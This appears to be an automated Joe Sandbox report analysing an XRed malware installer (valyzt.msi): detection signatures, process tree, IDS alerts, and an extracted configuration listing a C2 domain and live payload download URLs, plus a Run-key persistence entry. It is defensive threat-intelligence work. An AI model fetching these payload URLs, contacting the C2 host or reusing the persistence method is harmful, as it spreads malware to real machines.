Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
valyzt.msi

Overview

General Information

Sample name:valyzt.msi
Analysis ID:1582346
MD5:53614b87538306b4f7437db8be2a0e47
SHA1:a6a777b24bb64067738386caa66787b8ed225726
SHA256:e86d059bd44bc6e4252972320cb811497ea87f3b0ef10eed5edfcd7acf44a3d8
Tags:knkbkk212msiuser-JAMESWT_MHT
Infos:

Detection

XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Document contains an embedded VBA macro which executes code when the document is opened / closed
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Classification

  • System is w10x64
  • msiexec.exe (PID: 7128 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\valyzt.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 1408 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • MSI4755.tmp (PID: 1124 cmdline: "C:\Windows\Installer\MSI4755.tmp" MD5: 71386F37F17778126296CA734975DB6D)
      • Synaptics.exe (PID: 6520 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: ACA4D70521DE30563F4F2501D4D686A5)
        • WerFault.exe (PID: 8156 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6520 -s 3156 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 3060 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • Synaptics.exe (PID: 7260 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: ACA4D70521DE30563F4F2501D4D686A5)
  • cleanup
{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
SourceRuleDescriptionAuthorStrings
valyzt.msiJoeSecurity_XRedYara detected XRedJoe Security
    valyzt.msiJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\Documents\EEGWXUHVUG\~$cache1JoeSecurity_XRedYara detected XRedJoe Security
        C:\Users\user\Documents\EEGWXUHVUG\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          C:\ProgramData\Synaptics\RCX49C5.tmpJoeSecurity_XRedYara detected XRedJoe Security
            C:\ProgramData\Synaptics\RCX49C5.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              C:\Windows\Installer\MSI4699.tmpJoeSecurity_XRedYara detected XRedJoe Security
                Click to see the 7 entries
                SourceRuleDescriptionAuthorStrings
                00000004.00000003.2105707960.0000000000773000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                  00000003.00000000.2035344533.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                    00000003.00000000.2035344533.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                      Process Memory Space: MSI4755.tmp PID: 1124JoeSecurity_XRedYara detected XRedJoe Security
                        Process Memory Space: Synaptics.exe PID: 6520JoeSecurity_XRedYara detected XRedJoe Security
                          SourceRuleDescriptionAuthorStrings
                          3.0.MSI4755.tmp.400000.0.unpackJoeSecurity_XRedYara detected XRedJoe Security
                            3.0.MSI4755.tmp.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                              System Summary

                              barindex
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Installer\MSI4755.tmp, ProcessId: 1124, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 6520, TargetFilename: C:\Users\user\AppData\Local\Temp\EbdP5pVY.xlsm
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:46:22.147888+010020448871A Network Trojan was detected192.168.2.549709142.250.186.174443TCP
                              2024-12-30T11:46:22.170043+010020448871A Network Trojan was detected192.168.2.549710142.250.186.174443TCP
                              2024-12-30T11:46:23.123167+010020448871A Network Trojan was detected192.168.2.549714142.250.186.174443TCP
                              2024-12-30T11:46:23.152498+010020448871A Network Trojan was detected192.168.2.549716142.250.186.174443TCP
                              2024-12-30T11:46:24.118313+010020448871A Network Trojan was detected192.168.2.549719142.250.186.174443TCP
                              2024-12-30T11:46:24.141235+010020448871A Network Trojan was detected192.168.2.549720142.250.186.174443TCP
                              2024-12-30T11:46:25.100339+010020448871A Network Trojan was detected192.168.2.549723142.250.186.174443TCP
                              2024-12-30T11:46:25.110473+010020448871A Network Trojan was detected192.168.2.549724142.250.186.174443TCP
                              2024-12-30T11:46:25.870288+010020448871A Network Trojan was detected192.168.2.549730142.250.186.174443TCP
                              2024-12-30T11:46:25.870327+010020448871A Network Trojan was detected192.168.2.549731142.250.186.174443TCP
                              2024-12-30T11:46:26.923984+010020448871A Network Trojan was detected192.168.2.549737142.250.186.174443TCP
                              2024-12-30T11:46:26.964376+010020448871A Network Trojan was detected192.168.2.549738142.250.186.174443TCP
                              2024-12-30T11:46:27.933383+010020448871A Network Trojan was detected192.168.2.549744142.250.186.174443TCP
                              2024-12-30T11:46:27.957017+010020448871A Network Trojan was detected192.168.2.549746142.250.186.174443TCP
                              2024-12-30T11:46:28.912183+010020448871A Network Trojan was detected192.168.2.549748142.250.186.174443TCP
                              2024-12-30T11:46:28.940968+010020448871A Network Trojan was detected192.168.2.549750142.250.186.174443TCP
                              2024-12-30T11:46:29.885211+010020448871A Network Trojan was detected192.168.2.549754142.250.186.174443TCP
                              2024-12-30T11:46:29.916391+010020448871A Network Trojan was detected192.168.2.549755142.250.186.174443TCP
                              2024-12-30T11:46:30.927049+010020448871A Network Trojan was detected192.168.2.549764142.250.186.174443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:46:22.654552+010028326171Malware Command and Control Activity Detected192.168.2.54971369.42.215.25280TCP

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: http://xred.site50.net/syn/Synaptics.rarhAvira URL Cloud: Label: malware
                              Source: http://xred.site50.net/syn/SSLLibrary.dlDAvira URL Cloud: Label: malware
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\Windows\Installer\MSI4755.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\Windows\Installer\MSI4755.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\ProgramData\Synaptics\RCX49C5.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\RCX49C5.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: valyzt.msiMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                              Source: C:\ProgramData\Synaptics\RCX49C5.tmpReversingLabs: Detection: 91%
                              Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                              Source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1ReversingLabs: Detection: 91%
                              Source: C:\Windows\Installer\MSI4755.tmpReversingLabs: Detection: 92%
                              Source: C:\Windows\SysWOW64\._cache_MSI4755.tmpReversingLabs: Detection: 55%
                              Source: valyzt.msiVirustotal: Detection: 70%Perma Link
                              Source: valyzt.msiReversingLabs: Detection: 65%
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 91.7% probability
                              Source: C:\Windows\SysWOW64\._cache_MSI4755.tmpJoe Sandbox ML: detected
                              Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1Joe Sandbox ML: detected
                              Source: C:\Windows\Installer\MSI4755.tmpJoe Sandbox ML: detected
                              Source: C:\ProgramData\Synaptics\RCX49C5.tmpJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49709 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49710 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49714 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.5:49717 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49716 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.5:49715 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49719 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49720 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49730 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49731 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.5:49743 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.5:49745 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49748 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49750 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49754 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49755 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49764 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49764 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49767 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49770 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49769 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49776 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49777 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49788 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49793 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.5:49795 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.5:49796 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49806 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49805 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49813 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49815 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49827 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49828 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49838 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49839 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49847 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49846 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49861 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49863 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49882 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49885 version: TLS 1.2
                              Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeFile opened: c:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                              Source: MSI4755.tmp, 00000003.00000000.2035344533.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: MSI4755.tmp, 00000003.00000000.2035344533.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: MSI4755.tmp, 00000003.00000000.2035344533.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                              Source: Synaptics.exe, 00000004.00000003.2105707960.0000000000773000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000004.00000003.2105707960.0000000000773000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000004.00000003.2105707960.0000000000773000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                              Source: valyzt.msiBinary or memory string: [autorun]
                              Source: valyzt.msiBinary or memory string: [autorun]
                              Source: valyzt.msiBinary or memory string: autorun.inf
                              Source: Synaptics.exe.3.drBinary or memory string: [autorun]
                              Source: Synaptics.exe.3.drBinary or memory string: [autorun]
                              Source: Synaptics.exe.3.drBinary or memory string: autorun.inf
                              Source: MSI4699.tmp.1.drBinary or memory string: [autorun]
                              Source: MSI4699.tmp.1.drBinary or memory string: [autorun]
                              Source: MSI4699.tmp.1.drBinary or memory string: autorun.inf
                              Source: ~$cache1.4.drBinary or memory string: [autorun]
                              Source: ~$cache1.4.drBinary or memory string: [autorun]
                              Source: ~$cache1.4.drBinary or memory string: autorun.inf
                              Source: MSI4755.tmp.1.drBinary or memory string: [autorun]
                              Source: MSI4755.tmp.1.drBinary or memory string: [autorun]
                              Source: MSI4755.tmp.1.drBinary or memory string: autorun.inf
                              Source: RCX49C5.tmp.3.drBinary or memory string: [autorun]
                              Source: RCX49C5.tmp.3.drBinary or memory string: [autorun]
                              Source: RCX49C5.tmp.3.drBinary or memory string: autorun.inf
                              Source: 674551.msi.1.drBinary or memory string: [autorun]
                              Source: 674551.msi.1.drBinary or memory string: [autorun]
                              Source: 674551.msi.1.drBinary or memory string: autorun.inf
                              Source: C:\Windows\Installer\MSI4755.tmpFile opened: C:\Users\userJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: excel.exeMemory has grown: Private usage: 2MB later: 69MB

                              Networking

                              barindex
                              Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.5:49713 -> 69.42.215.252:80
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49710 -> 142.250.186.174:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49714 -> 142.250.186.174:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49716 -> 142.250.186.174:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49709 -> 142.250.186.174:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49720 -> 142.250.186.174:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49723 -> 142.250.186.174:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49730 -> 142.250.186.174:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49731 -> 142.250.186.174:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49738 -> 142.250.186.174:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49746 -> 142.250.186.174:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49748 -> 142.250.186.174:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49750 -> 142.250.186.174:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49724 -> 142.250.186.174:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49737 -> 142.250.186.174:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49754 -> 142.250.186.174:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49719 -> 142.250.186.174:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49755 -> 142.250.186.174:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49764 -> 142.250.186.174:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49744 -> 142.250.186.174:443
                              Source: Malware configuration extractorURLs: xred.mooo.com
                              Source: unknownDNS query: name: freedns.afraid.org
                              Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=FQNrFMPCubAKFj9y0Z4k1ouEUX4Kui-QjTdr291lluRJVHeBtM1mmeusg_KkXpwdOwLJs5cOvnhmTLnOvRQR4IVppbf3RIy65RY9Q-WoT2r9-CIWSaAiRQVqHD4q_Ul2GM-1Je42Oomn7qeJ5CNwHAcFXx9lSOPP_EtpXCcGhvcSUwTGnBqeegrs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=FQNrFMPCubAKFj9y0Z4k1ouEUX4Kui-QjTdr291lluRJVHeBtM1mmeusg_KkXpwdOwLJs5cOvnhmTLnOvRQR4IVppbf3RIy65RY9Q-WoT2r9-CIWSaAiRQVqHD4q_Ul2GM-1Je42Oomn7qeJ5CNwHAcFXx9lSOPP_EtpXCcGhvcSUwTGnBqeegrs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
